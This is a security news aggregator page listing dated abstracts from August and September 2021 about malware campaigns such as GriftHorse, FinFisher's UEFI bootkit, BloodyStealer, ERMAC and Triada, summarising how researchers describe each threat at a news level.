Abstract
Mirai_ptea_Rimasuta, an old and unpopular variant of Mirai, has resurfaced to exploit a zero-day vulnerability in RUIJIE router devices. The attackers have redesigned the encryption algorithm and C2 communication protocol; it uses the TEA algorithm and encrypts other sensitive resource info. Users are su ... Cyware Alerts - Hacker News
September 30, 2021
Gaming Platforms Face a Major Threat from BloodyStealer Full Text
Abstract
Kaspersky uncovered a new trojan called BloodyStealer aimed at gamers' accounts on EA Origin, Steam, Epic Games, GOG, and other services. Since its discovery, BloodyStealer has already targeted users based in Latin America, Asia Pacific, and Europe. This latest development indicates the rapid pac ... Cyware Alerts - Hacker News
September 30, 2021
GhostEmperor: From ProxyLogon to kernel mode Full Text
Abstract
GhostEmperor uses a formerly unknown Windows kernel mode rootkit dubbed Demodex and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.Kaspersky Labs
September 30, 2021
Mac Users Targeted by Trojanized iTerm2 App Full Text
Abstract
When this app is executed, it downloads and runs a malicious Python script. This malware, which Trend Micro has detected as TrojanSpy.Python.ZURU.A, collects private data from a victim’s machine.Trend Micro
September 29, 2021
Beware! This Android Trojan Stole Millions of Dollars from Over 10 Million Users Full Text
Abstract
A newly discovered "aggressive" mobile campaign has infected north of 10 million users from over 70 countries via seemingly innocuous Android apps that subscribe the individuals to premium services costing €36 (~$42) per month without their knowledge. Zimperium zLabs dubbed the malicious trojan "GriftHorse." The money-making scheme is believed to have been under active development starting from November 2020, with victims reported across Australia, Brazil, Canada, China, France, Germany, India, Russia, Saudi Arabia, Spain, the U.K., and the U.S. No fewer than 200 trojan applications were used in the campaign, making it one of the most widespread scams to have been uncovered in 2021. What's more, the malicious apps catered to a varied set of categories ranging from Tools and Entertainment to Personalization, Lifestyle, and Dating, effectively widening the scale of the attacks. One of the apps, Handy Translator Pro, amassed as much as 500,000 downloads. ... The Hacker News
September 29, 2021
GriftHorse malware infected more than 10 million Android phones from 70 countries Full Text
Abstract
Security researchers uncovered a massive malware operation, dubbed GriftHorse, that has already infected more than 10 million Android devices worldwide. Security researchers from Zimperium have uncovered a piece of malware, dubbed GriftHorse, that...Security Affairs
September 29, 2021
New FinSpy Malware Variant Infects Windows Systems With UEFI Bootkit Full Text
Abstract
Commercially developed FinFisher surveillanceware has been upgraded to infect Windows devices using a UEFI (Unified Extensible Firmware Interface) bootkit that leverages a trojanized Windows Boot Manager, marking a shift in infection vectors that allows it to elude discovery and analysis. Detected in the wild since 2011, FinFisher (aka FinSpy or Wingbird) is a spyware toolset for Windows, macOS, and Linux developed by Anglo-German firm Gamma International and supplied exclusively to law enforcement and intelligence agencies. But as with NSO Group's Pegasus, the software has also allegedly been used to spy on Bahraini activists in the past and was delivered as part of spear-phishing campaigns in September 2017. FinFisher is equipped to harvest user credentials, file listings, and sensitive documents, record keystrokes, siphon email messages from Thunderbird, Outlook, Apple Mail, and Icedove, intercept Skype contacts, chats, calls and transferred files, and capture audio and video... The Hacker News
September 29, 2021
Experts observed for the first time FinFisher infections involving usage of a UEFI bootkit Full Text
Abstract
Experts spotted a new variant of the FinFisher surveillance spyware that is able to hijack and replace the Windows UEFI bootloader to infect Windows machines. Malware researchers at Kaspersky have spotted a new improvement of the infamous commercial...Security Affairs
September 29, 2021
New Android malware steals millions after infecting 10M phones Full Text
Abstract
A large-scale malware campaign has infected more than 10 million Android devices from over 70 countries and likely stole hundreds of millions from its victims by subscribing to paid services without their knowledge.BleepingComputer
September 29, 2021
DoppelDridex Delivered via Slack and Discord Full Text
Abstract
Several recent phishing campaigns have attempted to deliver a variant of the Dridex banking trojan that is named as DoppelDridex, via payloads staged on Slack and Discord CDNs.Security Soup
September 29, 2021
GriftHorse Android Trojan Steals Millions from Over 10 Million Victims Globally Full Text
Abstract
Forensic evidence of this active Android Trojan attack, which Zimperium researchers have named GriftHorse, suggests that the threat group has been running this campaign since November 2020.Zimperium
September 28, 2021
FinFisher malware hijacks Windows Boot Manager with UEFI bootkit Full Text
Abstract
Commercially developed FinFisher malware now can infect Windows devices using a UEFI bootkit that it injects in the Windows Boot Manager.BleepingComputer
September 28, 2021
New BloodyStealer Trojan Steals Gamers’ Epic Games and Steam Accounts Full Text
Abstract
A new advanced trojan sold on Russian-speaking underground forums comes with capabilities to steal users' accounts on popular online video game distribution services, including Steam, Epic Games Store, and EA Origin, underscoring a growing threat to the lucrative gaming market. Cybersecurity firm Kaspersky, which coined the malware "BloodyStealer," said it first detected the malicious tool in March 2021 as being advertised for sale at an attractive price of 700 RUB (less than $10) for one month or $40 for a lifetime subscription. Attacks using BloodyStealer have been uncovered so far in Europe, Latin America, and the Asia-Pacific region. "BloodyStealer is a Trojan-stealer capable of gathering and exfiltrating various types of data, for cookies, passwords, forms, banking cards from browsers, screenshots, log-in memory, and sessions from various applications," the company said. The information harvested from gaming apps, such as Bethesda, Epic Games, GOG,... The Hacker News
September 28, 2021
Gamers Beware: Malware Hunts Steam, Epic and EA Origin Accounts Full Text
Abstract
The BloodyStealer trojan helps cyberattackers go after in-game goods and credits.Threatpost
September 28, 2021
ERMAC, a new banking Trojan that borrows the code from Cerberus malware Full Text
Abstract
ERMAC is a new Android banking Trojan that can steal financial data from 378 banking and wallet apps. Researchers from Threatfabric found in July a new Android banking trojan dubbed ERMAC that is almost fully based on the popular banking trojan Cerberus....Security Affairs
September 28, 2021
New BloodyStealer malware is targeting the gaming sector Full Text
Abstract
Researchers spotted a new malware, dubbed BloodyStealer, that could allow stealing accounts for multiple gaming platforms. Researchers from Kaspersky have spotted a new malware dubbed BloodyStealer that is being used by threat actors to steal accounts...Security Affairs
September 28, 2021
Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0 day to spread Full Text
Abstract
Mirai_ptea_Rimasuta now has a built-in mechanism to check if the running environment is a sandbox. It also encrypts the network traffic to counter the network level detection.Netlab
September 27, 2021
Microsoft Warns of FoggyWeb Malware Targeting Active Directory FS Servers Full Text
Abstract
Microsoft on Monday revealed new malware deployed by the hacking group behind the SolarWinds supply chain attack last December to deliver additional payloads and steal sensitive information from Active Directory Federation Services (AD FS) servers. The tech giant's Threat Intelligence Center (MSTIC) codenamed the "passive and highly targeted backdoor" FoggyWeb, making it the latest tool of the threat actor tracked as Nobelium in a long list of cyber weaponry such as Sunburst, Sunspot, Raindrop, Teardrop, GoldMax, GoldFinder, Sibot, Flipflop, NativeZone, EnvyScout, BoomBox, and VaporRage. "Once Nobelium obtains credentials and successfully compromises a server, the actor relies on that access to maintain persistence and deepen its infiltration using sophisticated malware and tools," MSTIC researchers said. "Nobelium uses FoggyWeb to remotely exfiltrate the configuration database of compromised AD FS servers, decrypted token-signing cer... The Hacker News
September 27, 2021
New Android Malware Steals Financial Data from 378 Banking and Wallet Apps Full Text
Abstract
The operators behind the BlackRock mobile malware have surfaced back with a new Android banking trojan called ERMAC that targets Poland and has its roots in the infamous Cerberus malware, according to the latest research. "The new trojan already has active distribution campaigns and is targeting 378 banking and wallet apps with overlays," ThreatFabric's CEO Cengiz Han Sahin said in an emailed statement. First campaigns involving ERMAC are believed to have begun in late August under the guise of the Google Chrome app. Since then, the attacks have expanded to include a range of apps such as banking, media players, delivery services, government applications, and antivirus solutions like McAfee. Almost fully based on the notorious banking trojan Cerberus, the Dutch cybersecurity firm's findings come from forum posts made by an actor named DukeEugene last month on August 17, inviting prospective customers to "rent a new android botnet with wide functionalit... The Hacker News
September 27, 2021
Jupyter infostealer continues to evolve and is distributed via MSI installers Full Text
Abstract
Cybersecurity researchers spotted a new version of the Jupyter infostealer which is distributed via MSI installers. Cybersecurity researchers from Morphisec have spotted a new version of the Jupyter infostealer that continues to be highly evasive. In...Security Affairs
September 27, 2021
New malware steals Steam, Epic Games Store, and EA Origin accounts Full Text
Abstract
A new malware sold on dark web forums is being used by threat actors to steal accounts for multiple gaming platforms, including Steam, Epic Games Store, and EA Origin.BleepingComputer
September 26, 2021
A New Jupyter Malware Version is Being Distributed via MSI Installers Full Text
Abstract
Cybersecurity researchers have charted the evolution of Jupyter, a .NET infostealer known for singling out the healthcare and education sectors, which makes it exceptional at defeating most endpoint security scanning solutions. The new delivery chain, spotted by Morphisec on September 8, underscores that the malware has not just continued to remain active but also showcases "how threat actors continue to develop their attacks to become more efficient and evasive." The Israeli company said it's currently investigating the scale and scope of the attacks. First documented in November 2020, Jupyter (aka Solarmarker) is likely Russian in origin and primarily targets Chromium, Firefox, and Chrome browser data, with additional capabilities that allow for full backdoor functionality, including features to siphon information and upload the details to a remote server and download and execute further payloads. Forensic evidence gathered by Morphisec shows that multiple versions o... The Hacker News
September 26, 2021
ZuRu Malware Exploits Baidu Search Results Full Text
Abstract
Experts reported new Mac ZuRu malware spreading via poisoned search engine results in China via Baidu. The criminals masquerade as iTerm2, an alternative to the default Mac terminal app. The fake app couldn't be flagged even with the extra security badge that Apple usually provides to notariz ... Cyware Alerts - Hacker News
September 23, 2021
New ZE Loader Targets Online Banking Users Full Text
Abstract
ZE Loader hides as part of legitimate software by performing a dynamic link library (DLL) hijacking. Using a malicious DLL instead of the original one, it replaces a DLL named DVDSetting.dll.Security Intelligence
September 23, 2021
Malware devs trick Windows validation with malformed certs Full Text
Abstract
Google researchers spotted malware developers creating malformed code signatures seen as valid in Windows to bypass security software.BleepingComputer
September 23, 2021
TinyTurla: New Malware By Russian Turla Full Text
Abstract
The Turla APT group is back with a new backdoor dubbed TinyTurla to gain persistence on targeted systems across Germany, the U.S., and Afghanistan. This malware got the attention of researchers when it targeted Afghanistan before the Taliban's recent takeover of the government. Organizations are ... Cyware Alerts - Hacker News
September 23, 2021
Water Basilisk- A Fileless Attack Campaign, a New Malware, and Lots of RATs Full Text
Abstract
Trend Micro researchers stumbled upon a fileless attack campaign that is leveraging a new crypter to propagate Remote Access Trojans (RATs). The RATs include BitRat, NjRat, LimeRat, Warzone, QuasarRat, and Nanocore RAT. The campaign was the most active in August.Cyware Alerts - Hacker News
September 23, 2021
Fake WhatsApp backup message delivers malware to Spanish speakers’ devices Full Text
Abstract
Spanish authorities are warning of a phishing campaign that impersonates messaging service WhatsApp in an attempt to trick recipients into downloading the NoPiques trojan.The Daily Swig
September 22, 2021
Malicious PowerPoint Documents Used to Distribute AgentTesla RAT Full Text
Abstract
McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment.McAfee
September 21, 2021
TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines Full Text
Abstract
Cisco Talos researchers recently discovered a new backdoor used by the Russian Turla APT group. They observed infections in the U.S., Germany, and, more recently, in Afghanistan.Cisco Talos
September 21, 2021
New Banking Trojan Abuses Public Platforms Including YouTube Full Text
Abstract
ESET reported a new Numando banking Trojan that abuses YouTube, Pastebin, and other public platforms to steal victims' financial credentials. It can simulate mouse clicks and keyboard actions, hijack the PC's shutdown/restart functions, kill browser processes, and take screenshots. Banki ... Cyware Alerts - Hacker News
September 21, 2021
Capoae Uses Known Tricks to Target Linux and Windows Full Text
Abstract
The new Capoae malware strain is reportedly targeting WordPress and Linux systems worldwide. Written in Go, it exploits around four different RCE vulnerabilities. Moreover, the malware contains a port scanner to find open ports and services for further exploitation. Among other advice, experts r ... Cyware Alerts - Hacker News
September 21, 2021
New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin Full Text
Abstract
A recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency. "The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency," Akamai security researcher Larry Cashdollar said in a write-up published last week. The PHP malware — codenamed "Capoae" (short for "Сканирование," the Russian word for "Scanning") — is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called "download-monitor," which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a Golang binary with decryption functionality, with the obfusc... The Hacker News
September 19, 2021
Numando, a new banking Trojan that abuses YouTube for remote configuration Full Text
Abstract
Numando, a new banking Trojan that abuses YouTube, Pastebin, and other public platforms as C2 infrastructure and to spread. ESET researchers spotted a new LATAM banking trojan, tracked as Numando, that abuses YouTube, Pastebin, and other public platforms...Security Affairs
September 19, 2021
Numando: A New Banking Trojan Targeting Latin American Users Full Text
Abstract
A newly spotted banking trojan has been caught leveraging legitimate platforms like YouTube and Pastebin to store its encrypted, remote configuration and commandeer infected Windows systems, making it the latest to join the long list of malware targeting Latin America (LATAM) after Guildma, Javali, Melcoz, Grandoreiro, Mekotio, Casbaneiro, Amavaldo, Vadokrist, and Janeleiro. The threat actor behind this malware family — dubbed " Numando " — is believed to have been active since at least 2018. "[Numando brings] interesting new techniques to the pool of Latin American banking trojans' tricks, like using seemingly useless ZIP archives or bundling payloads with decoy BMP images," ESET researchers said in a technical analysis published on Friday. "Geographically, it focuses almost exclusively on Brazil with rare campaigns in Mexico and Spain." Written in Delphi, the malware comes with an array of backdoor capabilities that allow it to control comprThe Hacker News
September 18, 2021
Yes, of course there’s now malware for Windows Subsystem for Linux Full Text
Abstract
Linux binaries have been found trying to take over Windows systems in what appears to be the first publicly identified malware to utilize Microsoft's Windows Subsystem for Linux (WSL) to install unwelcome payloads.The Register
September 17, 2021
New Malware Targets Windows Subsystem for Linux to Evade Detection Full Text
Abstract
A number of malicious samples have been created for the Windows Subsystem for Linux (WSL) with the goal of compromising Windows machines, highlighting a sneaky method that allows the operators to stay under the radar and thwart detection by popular anti-malware engines. The "distinct tradecraft" marks the first instance where a threat actor has been found abusing WSL to install subsequent payloads. "These files acted as loaders running a payload that was either embedded within the sample or retrieved from a remote server and was then injected into a running process using Windows API calls," researchers from Lumen Black Lotus Labs said in a report published on Thursday. Windows Subsystem for Linux, launched in August 2016, is a compatibility layer that's designed to run Linux binary executables (in ELF format) natively on the Windows platform without the overhead of a traditional virtual machine or dual-boot setup. The earliest artifacts date back to MThe Hacker News
September 17, 2021
A new Win malware uses Windows Subsystem for Linux (WSL) to evade detection Full Text
Abstract
Security researchers spotted a new malware that uses Windows Subsystem for Linux (WSL) to evade detection in attacks against Windows machines. Security researchers from Lumen’s Black Lotus Labs have discovered several malicious Linux binaries developed...Security Affairs
September 16, 2021
New malware uses Windows Subsystem for Linux for stealthy attacks Full Text
Abstract
Security researchers have discovered malicious Linux binaries created for the Windows Subsystem for Linux (WSL), indicating that hackers are trying out new methods to compromise Windows machines.BleepingComputer
September 16, 2021
Capoae Malware Ramps Up: Uses Multiple Vulnerabilities and Tactics to Spread Full Text
Abstract
The malware’s primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they’ve been infected, these systems are then used to mine cryptocurrency.Akamai
September 16, 2021
Novel Malware Samples Trying to Hack Windows from its Linux Subsystem Full Text
Abstract
Security researchers at Lumen’s Black Lotus Labs have found a series of malware samples that were configured to infect the Windows Subsystem for Linux and then pivot to its native Windows environment.The Record
September 14, 2021
New Stealthier ZLoader Variant Spreading Via Fake TeamViewer Download Ads Full Text
Abstract
Users searching for TeamViewer remote desktop software on search engines like Google are being redirected to malicious links that drop ZLoader malware onto their systems while simultaneously embracing a stealthier infection chain that allows it to linger on infected devices and evade detection by security solutions. "The malware is downloaded from a Google advertisement published through Google Adwords," researchers from SentinelOne said in a report published on Monday. "In this campaign, the attackers use an indirect way to compromise victims instead of using the classic approach of compromising the victims directly, such as by phishing." First discovered in 2016, ZLoader (aka Silent Night and ZBot) is a fully-featured banking trojan and a fork of another banking malware called ZeuS, with newer versions implementing a VNC module that grants adversaries remote access to victim systems. The malware is in active development, with criminal actors spawning anThe Hacker News
September 14, 2021
ZLoader’s Back, Abusing Google AdWords, Disabling Windows Defender Full Text
Abstract
The well-known banking trojan retools for stealth with a whole new attack routine, including using ads for Microsoft TeamViewer and Zoom to lure victims in.Threatpost
September 14, 2021
Vermilion Strike, a Linux implementation of Cobalt Strike Beacon used in attacks Full Text
Abstract
Researchers discovered Linux and Windows implementations of the Cobalt Strike Beacon developed by attackers that were actively used in attacks in the wild. Threat actors re-implemented from scratch unofficial Linux and Windows versions of the Cobalt...Security Affairs
September 13, 2021
Linux Implementation of Cobalt Strike Beacon Targeting Organizations Worldwide Full Text
Abstract
Researchers on Monday took the wraps off a newly discovered Linux and Windows re-implementation of Cobalt Strike Beacon that's actively set its sights on government, telecommunications, information technology, and financial institutions in the wild. The as-yet undetected version of the penetration testing tool — codenamed "Vermilion Strike" — marks one of the rare Linux ports , which has been traditionally a Windows-based red team tool heavily repurposed by adversaries to mount an array of targeted attacks. Cobalt Strike bills itself as a " threat emulation software ," with Beacon being the payload engineered to model an advanced actor and duplicate their post-exploitation actions. "The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands and writing to files," Intezer researchers said in a report publisheThe Hacker News
September 13, 2021
The new maxtrilha trojan is being disseminated and targeting several banks Full Text
Abstract
A new banking trojan dubbed maxtrilha (due to its encryption key) has been discovered in the last few days and targeting customers of European and South American banks. The new maxtrilha trojan is being disseminated and targeting several...Security Affairs
September 11, 2021
New SOVA Android Banking trojan is rapidly growing Full Text
Abstract
SOVA is a new Android banking trojan that targets banking applications, cryptocurrency wallets, and shopping apps from the U.S. and Spain. Researchers from cybersecurity firm ThreatFabric have spotted in the beginning of August a new Android banking...Security Affairs
September 11, 2021
New Dridex Variant Being Spread By Crafted Excel Document Full Text
Abstract
Dridex is a Trojan malware, also known as Bugat or Cridex, which is capable of stealing sensitive information from infected machines and delivering and executing malicious modules (dll).Fortinet
September 10, 2021
SOVA: New Android Banking Trojan Emerges With Growing Capabilities Full Text
Abstract
A mix of banking applications, cryptocurrency wallets, and shopping apps from the U.S. and Spain are the target of a newly discovered Android trojan that could enable attackers to siphon personally identifiable information from infected devices, including banking credentials and open the door for on-device fraud. Dubbed S.O.V.A. (referring to the Russian word for owl), the current version of the banking malware comes with myriad features to steal credentials and session cookies through web overlay attacks, log keystrokes, hide notifications, and manipulate the clipboard to insert modified cryptocurrency wallet addresses, with future plans to incorporate on-device fraud through VNC , carry out DDoS attacks, deploy ransomware, and even intercept two-factor authentication codes. The malware was discovered in the beginning of August 2021 by researchers from Amsterdam-based cybersecurity firm ThreatFabric. Overlay attacks typically involve the theft of confidential user information usThe Hacker News
September 10, 2021
Experts Link Sidewalk Malware Attacks to Grayfly Chinese Hacker Group Full Text
Abstract
A previously undocumented backdoor that was recently found targeting an unnamed computer retail company based in the U.S. has been linked to a longstanding Chinese espionage operation dubbed Grayfly. In late August, Slovakian cybersecurity firm ESET disclosed details of an implant called SideWalk, which is designed to load arbitrary plugins sent from an attacker-controlled server, gather information about running processes in the compromised systems, and transmit the results back to the remote server. The cybersecurity firm attributed the intrusion to a group it tracks as SparklingGoblin, an adversary believed to be connected to the Winnti (aka APT41) malware family. But latest research published by researchers from Broadcom's Symantec has pinned the SideWalk backdoor on the China-linked espionage group, pointing out the malware's overlaps with the older Crosswalk malware, with the latest Grayfly hacking activities singling out a number of organizations in Mexico, TaiwanThe Hacker News
September 06, 2021
Traffic Exchange Networks Distributing Malware Disguised as Cracked Software Full Text
Abstract
An ongoing campaign has been found to leverage a network of websites acting as a "dropper as a service" to deliver a bundle of malware payloads to victims looking for "cracked" versions of popular business and consumer applications. "These malware included an assortment of click fraud bots, other information stealers, and even ransomware," researchers from cybersecurity firm Sophos said in a report published last week. The attacks work by taking advantage of a number of bait pages hosted on WordPress that contain "download" links to software packages, which, when clicked, redirect the victims to a different website that delivers potentially unwanted browser plug-ins and malware, such as installers for Raccoon Stealer , Stop ransomware, the Glupteba backdoor, and a variety of malicious cryptocurrency miners that masquerade as antivirus solutions. "Visitors who arrive on these sites are prompted to allow notifications; If they allow thThe Hacker News
September 6, 2021
Malware found pre-installed in cheap push-button mobile phones sold in Russia Full Text
Abstract
Security researcher ValdikSS found malware preinstalled in four low-budget push-button mobile phones available for sale on Russian e-stores. A Russian security researcher that goes online with the name of ValdikSS has found malware preinstalled in four...Security Affairs
September 5, 2021
This GPU-Based Malware Attack can Dodge Usual Security Checks Full Text
Abstract
A post was spotted on a hacker forum where someone advertised a PoC for hiding and executing malicious codes from the GPU. The seller who advertised the recent PoC has denied any possible connection with the JellyFish malware. Vendors of GPUs should be taking note of it and start preparing for coun ... Read MoreCyware Alerts - Hacker News
September 04, 2021
Watch out for new malware campaign’s ‘Windows 11 Alpha’ attachment Full Text
Abstract
Relying on a simple recipe that has proved successful time and time again, threat actors have deployed a malware campaign recently that used a Windows 11 theme to lure recipients into activating malicious code placed inside Microsoft Word documents.BleepingComputer
September 03, 2021
This New Malware Family Using CLFS Log Files to Avoid Detection Full Text
Abstract
Cybersecurity researchers have disclosed details about a new malware family that relies on the Common Log File System ( CLFS ) to hide a second-stage payload in registry transaction files in an attempt to evade detection mechanisms. FireEye's Mandiant Advanced Practices team, which made the discovery, dubbed the malware PRIVATELOG , and its installer, STASHLOG . Specifics about the identities of the threat actor or their motives remain unclear. Although the malware is yet to be detected in real-world attacks aimed at customer environments or be spotted launching any second-stage payloads, Mandiant suspects that PRIVATELOG could still be in development, the work of a researcher, or deployed as part of a highly targeted activity. CLFS is a general-purpose logging subsystem in Windows that's accessible to both kernel-mode as well as user-mode applications such as database systems, OLTP systems, messaging clients, and network event management systems for building and sharing hThe Hacker News
September 3, 2021
PRIVATELOG, a new malware that leverages Common Log File System (CLFS) to avoid detection Full Text
Abstract
Mandiant researchers spotted a new malware family, dubbed PRIVATELOG, that relies on the Common Log File System (CLFS) to evade detection solutions. FireEye's Mandiant cybersecurity researchers spotted a new malware family, named PRIVATELOG, that...Security Affairs
August 31, 2021
Joker Malware is Back - Yet Again! Full Text
Abstract
The Belgian Police issued a warning about the return of the Joker virus that is attacking Android devices - once more. The virus has been detected in eight apps in the Google Play Store; however, the apps have been removed by Google.Cyware Alerts - Hacker News
August 31, 2021
Evil WhatsApp Mod Spotted Infecting Android Users with Malware Full Text
Abstract
A version of FMWhatsApp, a popular WhatsApp mod, was found to carry a trojan. Dubbed Triada, the trojan downloads malicious apps on victims’ devices and is found in version 16.80.0 of FMWhatsApp.Cyware Alerts - Hacker News
August 30, 2021
Konni RAT Targets Russian Users Full Text
Abstract
In late July, an ongoing spear-phishing campaign was discovered abusing two Russian language documents, which were laced with the same malicious macro to deliver Konni RAT.Cyware Alerts - Hacker News
August 29, 2021
FIN8 Returns with New Sardonic Backdoor Full Text
Abstract
Financially motivated FIN8 group attempted to compromise the networks of a U.S. financial organization using a new malware - Sardonic. Sardonic can establish persistence on the infected machine and collects system info, executes arbitrary commands, loads/executes extra plugins, and the results are ... Read MoreCyware Alerts - Hacker News
August 26, 2021
Pysa is Using Keyword-based Scripts to Target Data Full Text
Abstract
A PowerShell script has disclosed details about different types of data that are stolen by the Pysa ransomware group. It has a list of 123 keywords. Some of the keywords are aimed at stealing data from folders related to investigations, crime, fraud, federal, hidden, bureau, illegal, terror, and se ... Read MoreCyware Alerts - Hacker News
August 25, 2021
RiskIQ Analysis Links EITest and Gootloader Campaigns, Once Thought to Be Disparate Full Text
Abstract
EITest was first identified in 2014 and historically used large numbers of compromised WordPress sites and social engineering techniques to trick users into downloading malware.Risk IQ
August 25, 2021
Attackers Drop Commodity RATs to Target Latin Americans Full Text
Abstract
A set of malware campaigns have been discovered spreading commodity RATs and using a .NET-based crypter service 3losh to target travel and hospitality businesses in Latin America. These campaigns use either compromised or attacker-controlled websites to host their tools and payloads. Furthermore, ... Read MoreCyware Alerts - Hacker News
August 25, 2021
New SideWalk Backdoor Targets U.S.-based Computer Retail Business Full Text
Abstract
A computer retail company based in the U.S. was the target of a previously undiscovered implant called SideWalk as part of a recent campaign undertaken by a Chinese advanced persistent threat group primarily known for singling out entities in East and Southeast Asia. Slovak cybersecurity firm ESET attributed the malware to an advanced persistent threat it tracks under the moniker SparklingGoblin, an adversary believed to be connected to the Winnti umbrella group, noting its similarities to another backdoor dubbed Crosswalk that was put to use by the same threat actor in 2019. "SideWalk is a modular backdoor that can dynamically load additional modules sent from its C&C [command-and-control] server, makes use of Google Docs as a dead drop resolver , and Cloudflare workers as a C&C server," ESET researchers Thibaut Passilly and Mathieu Tartare said in a report published Tuesday. "It can also properly handle communication behind a proxy." Since firThe Hacker News
August 25, 2021
Modified version of Android WhatsApp installs Triada Trojan Full Text
Abstract
Experts spotted a modified version of WhatsApp for Android, which offers extra features, but that installs the Triada Trojan on the devices. Researchers from Kaspersky spotted a modified version of WhatsApp for Android, which offers extra features,...Security Affairs
August 25, 2021
The ‘Joker’ Virus Has Returned to Android Apps in the Google Play Store Full Text
Abstract
"This malicious program has been detected in eight Play Store applications that Google has suppressed," say the Belgian authorities in a statement published this Friday on their website.Entrepreneur
August 24, 2021
Custom WhatsApp Build Delivers Triada Malware Full Text
Abstract
Researchers have spotted the latest version of the Triada trojan targeting mobile devices via an advertising SDK.Threatpost
August 24, 2021
Modified Version of WhatsApp for Android Spotted Installing Triada Trojan Full Text
Abstract
A modified version of the WhatsApp messaging app for Android has been trojanized to serve malicious payloads, display full-screen ads, and sign up device owners for unwanted premium subscriptions without their knowledge. "The Trojan Triada snuck into one of these modified versions of the messenger called FMWhatsApp 16.80.0 together with the advertising software development kit (SDK)," researchers from Russian cybersecurity firm Kaspersky said in a technical write-up published Tuesday. "This is similar to what happened with APKPure , where the only malicious code that was embedded in the app was a payload downloader." Modified versions of legitimate Android apps — aka Modding — are designed to perform functions not originally conceived or intended by the app developers, and FMWhatsApp allows users to customize the app with different themes, personalize icons, and hide features like last seen, and even deactivate video calling features. The tampered variant ofThe Hacker News
August 24, 2021
Malicious WhatsApp mod infects Android devices with malware Full Text
Abstract
A malicious version of the FMWhatsappWhatsApp mod delivers a Triadatrojan payload, a nasty surprise that infects their devices with additional malware, including the very hard-to-remove xHelper trojan.BleepingComputer
August 20, 2021
ShadowPad Malware is Becoming a Favorite Choice of Chinese Espionage Groups Full Text
Abstract
ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017. "The adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said in a detailed overview of the malware, adding "some threat groups stopped developing their own backdoors after they gained access to ShadowPad." The American cybersecurity firm dubbed ShadowPad a "masterpiece of privately sold malware in Chinese espionage." A successor to PlugX and a modular malware platform since 2015, ShadowPad catapulted to widespread attention in the wake of supply chain incidents targeting NetSarang , CCleaner , and ASUS , leading the operators to shift tactics and update their defensive measures with advanced anti-detection and persistence techniques. More recently, attaThe Hacker News
August 20, 2021
After Europe, Flubot Malware Campaign Hits Australians via Scam Text Messages Full Text
Abstract
FluBot is a type of malware targeting Android users, but iPhone users can also receive messages. It tells the receiver they missed a call or have a new voicemail, providing a fake link to listen.The Guardian
August 19, 2021
FluBot Malware is on the Fly Again with New Overlay Attacks Full Text
Abstract
FluBot was found targeting finance apps belonging to Polish and German banks by impersonating the app's login form in a new overlay attack. Earlier, in the month of June, this malware was seen imitating postal and logistic service apps to lure its victims. While smartphone users must restrict ... Read MoreCyware Alerts - Hacker News
August 19, 2021
How Diavol and TrickBot are Connected? Full Text
Abstract
IBM X-Force Threat Intelligence studied different versions of the Diavol ransomware whose code configuration hinted at a possible link to the TrickBot group. TrickBot has been observed using group and campaign IDs, which are used by Diavol as well. Experts say, sharing threat intelligence between o ... Read MoreCyware Alerts - Hacker News
August 18, 2021
Houdini malware returns, enterprise risk assessment compromised by Amazon Sidewalk Full Text
Abstract
The research suggests that device identity spoofing threatens to become far more prevalent. Houdini is a well-known remote access trojan (RAT), but the research shows this particular use is novel.Help Net Security
August 18, 2021
NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware Full Text
Abstract
A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper. Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021. The "clever disguise of exploit code amongst legitimate code" and the use of custom malware enables the attackers to avoid detection, Volexity researchers said. The attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in August 2020 and March 2021 . Successful exploitationThe Hacker News
August 17, 2021
Apple: CSAM Image-Detection Backdoor ‘Narrow’ in Scope Full Text
Abstract
Computing giant tries to reassure users that the tool won’t be used for mass surveillance.Threatpost
August 17, 2021
Resurgent FluBot malware targets German and Polish banks Full Text
Abstract
Netcraft’s research into the FluBot malware confirms that its operations are expanding rapidly, with a spike in the number of malware distribution pages deployed and finance apps affected.kkhacklabs
August 17, 2021
Neurevt Trojan Updated with Backdoor and Information Stealing Capabilities to Target Mexican Organizations Full Text
Abstract
This trojan appears to target Mexican organizations. Cisco Talos is tracking these campaigns embedding URLs in the associated droppers, which belong to many major banks in Mexico.Cisco Talos
August 17, 2021
Malicious Ads Target Cryptocurrency Users With Cinobi Banking Trojan Full Text
Abstract
A new social engineering-based malvertising campaign targeting Japan has been found to deliver a malicious application that deploys a banking trojan on compromised Windows machines to steal credentials associated with cryptocurrency accounts. The application masquerades as an animated porn game, a reward points application, or a video streaming application, Trend Micro researchers Jaromir Horejsi and Joseph C Chen said in an analysis published last week, attributing the operation to a threat actor it tracks as Water Kappa, which was previously found targeting Japanese online banking users with the Cinobi trojan by leveraging exploits in Internet Explorer browser. The switch in tactics is an indicator that the adversary is singling out users of web browsers other than Internet Explorer, the researchers added. Water Kappa's latest infection routine commences with malvertisements for either Japanese animated porn games, reward points apps, or video streaming services, with tThe Hacker News
August 16, 2021
